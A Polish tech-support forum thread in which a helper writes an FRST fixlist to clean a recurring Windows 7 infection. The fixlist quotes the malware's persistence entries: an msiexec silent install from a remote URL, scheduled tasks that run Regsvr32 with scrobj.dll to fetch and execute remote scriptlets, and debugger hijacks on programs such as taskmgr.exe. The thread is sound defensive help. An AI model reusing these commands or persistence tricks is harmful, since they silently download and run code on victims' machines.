Witam.
Nie mogę pozbyć się jakiegoś świństwa.
Po skanowaniach niby jest ok ale po ponownym uruchomieniu i skanowaniu zawsze coś znajdzie nowego i zaczyna się rozprzestrzeniać.
FRST : http://www.wklej.org/id/3118502/
Addition: http://www.wklej.org/id/3118503/
Shortcut: http://www.wklej.org/id/3118504/
System: windows 7
Proszę o pomoc.
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:
HKLM-x32\...\Run: [NWEReboot] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2579401441-4235509907-2503649597-1000\...\Run: [FactoryTest] => C:\Windows\Test.bat
HKU\S-1-5-21-2579401441-4235509907-2503649597-1000\...\Run: [Power2GoExpress] => NA
HKU\S-1-5-21-2579401441-4235509907-2503649597-1000\...\Run: [AVG-Secure-Search-Update_JUNE2013_TB] => "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe" /PROMPT /CMPID=JUNE2013_TB
HKU\S-1-5-21-2579401441-4235509907-2503649597-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81NjI5NUFcMjw5RWhYOWQLFdzQOTU3NdzQMTI1RkQWMF== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
GroupPolicy: Ograniczenia - Chrome <======= UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
BHO-x32: Brak nazwy -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> Brak pliku
Toolbar: HKU\S-1-5-21-2579401441-4235509907-2503649597-1001 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku
Toolbar: HKU\S-1-5-21-2579401441-4235509907-2503649597-1001 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
U2 CLKMSVC10_3A60B698; Brak ImagePath
U2 CLKMSVC10_C3B3B687; Brak ImagePath
U2 DriverService; Brak ImagePath
U2 IAStorDataMgrSvc; Brak ImagePath
U2 idealife Update Service; Brak ImagePath
U3 IGRS; Brak ImagePath
U2 IviRegMgr; Brak ImagePath
S3 NAVENG; \??\C:\Program Files (x86)\Norton 360\NortonData\22.5.2.15\Definitions\SDSDefs\20160702.006\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton 360\NortonData\22.5.2.15\Definitions\SDSDefs\20160702.006\EX64.SYS [X]
U2 Oasis2Service; Brak ImagePath
U2 PCCarerServic; Brak ImagePath
U2 ReadyComm.DirectRouter; Brak ImagePath
U2 RichVideo; Brak ImagePath
U2 RtLedService; Brak ImagePath
U2 SoftwareService; Brak ImagePath
U2 Stereo Service; Brak ImagePath
2017-05-18 17:25 - 2017-05-19 10:38 - 00000000 ____D C:\AdwCleaner
2017-05-11 20:49 - 2017-05-11 20:49 - 00000000 _____ C:\windows\SysWOW64\3333333
2017-05-11 20:49 - 2017-05-11 20:49 - 00000000 _____ C:\windows\SysWOW64\1111111
2017-05-11 20:49 - 2017-05-11 20:49 - 00000000 _____ C:\windows\SysWOW64\00
2017-05-10 23:59 - 2017-05-10 23:59 - 00000000 _____ C:\windows\SysWOW64\1
2017-05-09 21:31 - 2017-05-11 20:49 - 00000000 _____ C:\windows\SysWOW64\1111
2017-04-20 19:09 - 2017-05-11 20:49 - 00000000 _____ C:\windows\SysWOW64\22
2017-04-20 19:09 - 2017-05-11 20:49 - 00000000 _____ C:\windows\SysWOW64\11
2017-05-17 16:35 - 2017-04-17 20:49 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-11 20:48 - 2017-04-17 20:44 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2013-07-29 13:03 - 2014-06-22 22:29 - 0003731 _____ () C:\Program Files (x86)\Mozilla Firefoxavg-secure-search.xml
Task: {480B42F6-D382-4199-9128-A319C7BCA437} - System32\Tasks\{052BDFA1-B680-49F0-B56F-9E9689598E60} => pcalua.exe -a C:\Users\Ewa\Downloads\psetup(1).exe -d C:\Users\Ewa\Downloads
Task: {556680A4-3AE3-457A-AE5B-D3C3B669180B} - System32\Tasks\{B4074253-755E-4E20-B983-22A0B94DAA3B} => Firefox.exe
Task: {89EE80AC-E987-4FBA-A974-4B674765C5A9} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81NjI5NUFcMjw5RWhYOWQLFdzQOTU3NdzQMTI1RkQWMF== scrobj.dll
Task: {D6F7A960-7F4C-47C6-8FD6-A4AACF5A9070} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\windows\TEMP\{F19A9B88-6FDD-4265-B390-FF1A81CFC2B7}.exe <==== UWAGA
Task: {DF531250-7965-475B-BAAB-C787BF365904} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81NjI5NUFcMjw5RWhYOWQLFdzQOTU3NdzQMTI1RkQWMF== scrobj.dll
Task: C:\windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\windows\TEMP\{F19A9B88-6FDD-4265-B390-FF1A81CFC2B7}.exe <==== UWAGA
EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.
Proponuję żebyś przeczytał całą poprzednią odpowiedź.
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:
C:\AdwCleaner
C:\Users\Ewa\AppData\LocalLow\Temp
DeleteQuarantine:
Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu